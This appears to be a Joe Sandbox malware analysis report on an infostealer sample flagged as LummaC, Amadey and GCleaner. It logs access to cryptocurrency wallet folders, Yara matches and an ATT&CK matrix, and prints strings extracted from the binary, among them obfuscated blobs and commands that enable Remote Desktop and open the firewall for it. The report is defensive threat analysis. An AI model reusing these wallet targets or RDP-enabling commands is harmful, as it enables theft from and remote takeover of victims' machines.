Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior

Source: Yara match

File source: Process Memory Space: 2ea5560900.exe PID: 3240, type: MEMORYSTR

Remote Access Functionality

Yara detected GCleaner

Source: Yara match	File source: 14.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.da4a000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.dcf6000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.a99d155ba8.exe.dcf6000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.da1e000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.da80000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.db00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3842363077.000000000DA4A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3833830695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3843410151.000000000DD30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.3810839454.000000000DCE6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3842363077.000000000DA1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3842910350.000000000DB00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3842363077.000000000DA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3843410151.000000000DCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: 2ea5560900.exe PID: 3240, type: MEMORYSTR

Contains functionality to start a terminal service

Source: wJWNpO6lcm.exe	String found in binary or memory: net start termservice
Source: wJWNpO6lcm.exe, 00000000.00000002.1414746165.0000000000C21000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: wJWNpO6lcm.exe, 00000000.00000002.1414746165.0000000000C21000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000002.1439116662.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000002.1439116662.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.1446784481.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.1446784481.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 DLL Side-Loading	4 Obfuscated Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	412 Process Injection	12 Software Packing	Security Account Manager	246 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	981 Security Software Discovery	Distributed Component Object Model	2 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	451 Virtualization/Sandbox Evasion	Cached Domain Credentials	451 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	412 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wJWNpO6lcm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Threatname: GCleaner

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
wJWNpO6lcm.exe